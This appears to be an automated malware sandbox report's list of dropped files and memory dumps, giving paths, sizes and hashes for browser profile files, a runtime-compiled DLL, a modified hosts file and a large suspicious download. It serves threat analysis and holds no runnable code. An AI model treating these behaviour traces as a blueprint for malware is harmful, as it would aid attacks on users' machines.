C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0446fcdd21b016db1f468971fb82a488

SHA1
726b91562bb75f80981f381e3c69d7d832c87c9d

SHA256
62c5dc18b25e758f3508582a7c58bb46b734a774d97fc0e8a20614235caa8222

SHA512
1df7c085042266959f1fe0aedc5f6d40ceba485b54159f51f0c38f17bb250b79ea941b735e1b6faf219f23fe8ab65ac4557f545519d52d5416b89ad0f9047a31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
b2ddbb83c6ac6400520dda8c884f4b19

SHA1
83181a36e32c4de7ae30e9ac52f2d6bd98cc9cb1

SHA256
575f31c38adb83f6021ca7379236c5c1410698f2f9690a1eb1a883ed56558d28

SHA512
538af7413a0b3512a9fb653981f62442782da1395f02a8f4e3a3c60825c9a3f721939613af6b35ebe4556da741b137e307aa31a34569ae09445ccda567a8eef2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
186B

MD5
094ab275342c45551894b7940ae9ad0d

SHA1
2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

SHA256
ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

SHA512
19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
404d3a721493d031d8210e065d926871

SHA1
9749babbd1a48657b5031378e2eeee139c7851d7

SHA256
8436eed8b44644d3069c1488232958acc9b60d643dbea6ead9dd8adc5ccebe90

SHA512
8cc76f3dfb9bb3104951cc44bab6e89807cd467adb7538cf31acba7990952e549da32dfca38296befea5458f186941d0604ad17ccbe42b133d5d09545bb17644

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ccd1579fe427ce0ae46c165547cf7cd9

SHA1
a08d5514e9b95afc6d58963852b2ce14a4ffae0d

SHA256
f0d019306c48744837ca7606bc6c20fd3d79b4e5fc6863225d75e64c69d8f143

SHA512
b53b2915a01f61eb94b8665ffa87bd2686ca00c21a3209ed307e4b360f3a69a2f3b035966ba31de28fd03c37e1ff396b758022d01996aad26e1ec3a6a3f329a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9aebe703db17f2550ac09af72a7cf2c7

SHA1
b805da2a04498aa6c6d03df98260d07387108028

SHA256
51e1096c9cdeba79d5efbe5776f6da782ddf80b34a8585918e9a5ece244f4aba

SHA512
09e8e82b13c07246fdae98e4fcebec5e9ce7ce0e5ec6bb13ca60d009422d7ffce73f6622262dbec126e02d13150c30e5a66feda7485e7755ecfc419af63d4ac3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
5e18458217130b145b341b3629ee9134

SHA1
9e87cc7b2c8a2fc0ba6cbb664065fd66e72d257b

SHA256
00d9852e2999a19ae729d3a3b19bf836b69bc37a4a0e6c65ed336d568e216bd5

SHA512
f4539235a52543f98507e62aa68c031c3b527f876694a5730d3167f85b73a541974dbb15f1a858884e546fbe21f8a002217cc55c546348cf79c7129121e192b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
4621697f3de91b112c41c4fa506680b8

SHA1
faf0f0551e8e2fde4d1d68a4c4835e50feac7704

SHA256
861599487197dafe0924b192ed517c6e5d3991ebffa3adffba643cf3655e2f68

SHA512
7872b1c80cf5d9b9c9fa4a18204fce0a800863e9b52708d20829b1f16f9b629cb560cb1f49634090ed59e245972b082d1cda5cc974db0549e742ff3eebc50d03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ee9f1be5d4d351a5c376b370adcf0eea

SHA1
1779cecfb13c6a2f0f2813ae65d0d91ebdcf5583

SHA256
70600f0f93bca5f0548bfe5503513caadda31cbcd14dc007824b0925a8626e4b

SHA512
fda7345f64a6352e99bb3f5d94e58751a71d45a27147f60da32d12ff0307dbe416f482f1b9950e52ce63cbb5f0e5c1647f72dbb7a05c5419ccd8b7980ea86754

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES658B.tmp

Filesize
1KB

MD5
36c94f15edb5808e3f908f025f442161

SHA1
91486f97ae5bc377384df87a4b199b0117914e05

SHA256
d9fb49e0a923f39f146bc10c90f3d42bad498e149046290eafbe948ee63f9894

SHA512
f795268b64b8b834be76257d0912fed5cd3cac4568f7796e65054c9107f88d16865dfe0d577d73baaeb40684096803c791bf6d6a7a1df099944244e8daa81510

Download Submit
C:\Users\Admin\AppData\Local\Temp\TcSjxocATU\Display (1).png

Filesize
418KB

MD5
cdc2270d70bf64b15e046182e859d5d6

SHA1
4a18c339df9b1a1900aaf5063f997b956f4d9721

SHA256
857606429e73a15b20ee76519e1c787013c5b6894184cf26cf9fe801f698a973

SHA512
7826d6a05d69ccbf4abda24ad98ffe23893345485e4795ab51054a208e215bb986492a817e8b5b6636c6125f83a42d140bdd22eea48e4cb4d77b30dc5e242dbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1pcmha0b.tvf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hirbzoa4\hirbzoa4.dll

Filesize
4KB

MD5
4f90b01dccdfae411e57b457f3ecc76a

SHA1
46d9dfe6ff82c47da2e3b7e24ea99799ea5ed62e

SHA256
3b21af210d892fb18bf7ed4b888bee6f39bdc90943a90b541d8dad116ffae7aa

SHA512
20c465bfee95fe7e2e7885d75d159c218ea98502b175e6a72738a304e82b57273ac0cb7a038903e491ac38ef0b14d74a0aa934863d31eb7051aa08d6430c2f66

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 364754.crdownload

Filesize
15.3MB

MD5
5bc9c103742fa7e457e906e07832c395

SHA1
142c19a8f1dd419ce9c2f251cbc263b8abf476de

SHA256
9030098c9b2ecabe713d76727ccc2be79663d55716644446bb1482d948697e17

SHA512
1633349abd47715ed0804cb08798e9b12c862fe4239953de21481a07de502d13be74879e8ce7a962c1c68e1c967b47337095cc7458c40e702023d6f241536221

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hirbzoa4\CSCAB7601C5E106462BA9A62828D1A2B80.TMP

Filesize
652B

MD5
1e637c5d70d0d1f21f5bc8bd842a659d

SHA1
3d76135577de8a0c0594f317bd6098f7d1104043

SHA256
891941b7d43bec0aedf14c95a334f4c9cc011c1a8d504d0ceaa1b11ca17859da

SHA512
615e455ec90a4fb2ed6669a4a9992e27467ffd8cb0774d4c9888c6ebcb2fff1f53778f32204f041c8b3c103cd40bd4a2a6f5de0aeb87ef2557e83f9c48d3f9fb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hirbzoa4\hirbzoa4.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hirbzoa4\hirbzoa4.cmdline

Filesize
607B

MD5
59c34e64fd40187af2cc416f95270892

SHA1
ba0e478bbd20aa43488cff2a288406d3c6b65a52

SHA256
b286b993a928aaee82f4eb9f0ccf052d0fea7712f5636627d8ab32bf183ba13d

SHA512
79ac1e1b4e5749c7959abbdb14a812a0f7c4940c57b575ed74aab21e31ba18a1e972d2c259c45e0af4f14c3fda38016a88d6e44d0e80c6b50ebf71005f0af46a

Download Submit
memory/1568-219-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-244-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-105-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-276-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-83-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-85-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-84-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-86-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-82-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-80-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-81-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-275-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-79-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-176-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-182-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-191-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-78-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-215-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-216-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-217-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-218-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-77-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-222-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-225-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-226-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-236-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-237-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-238-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-239-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-240-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-241-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-242-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-243-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-274-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-245-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-246-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-247-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-248-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-249-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-250-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-251-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-252-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-253-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-254-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-255-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-256-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-257-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-258-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-259-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-260-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-261-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-262-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-263-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-264-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-265-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-266-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-267-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-268-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-269-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-270-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-271-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-272-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/1568-273-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/5444-123-0x0000012AF1DB0000-0x0000012AF1DD2000-memory.dmp

Filesize
136KB

Download
memory/5668-146-0x00000239776D0000-0x0000023977718000-memory.dmp

Filesize
288KB

Download
memory/5928-171-0x000001F96F630000-0x000001F96F638000-memory.dmp

Filesize
32KB

Download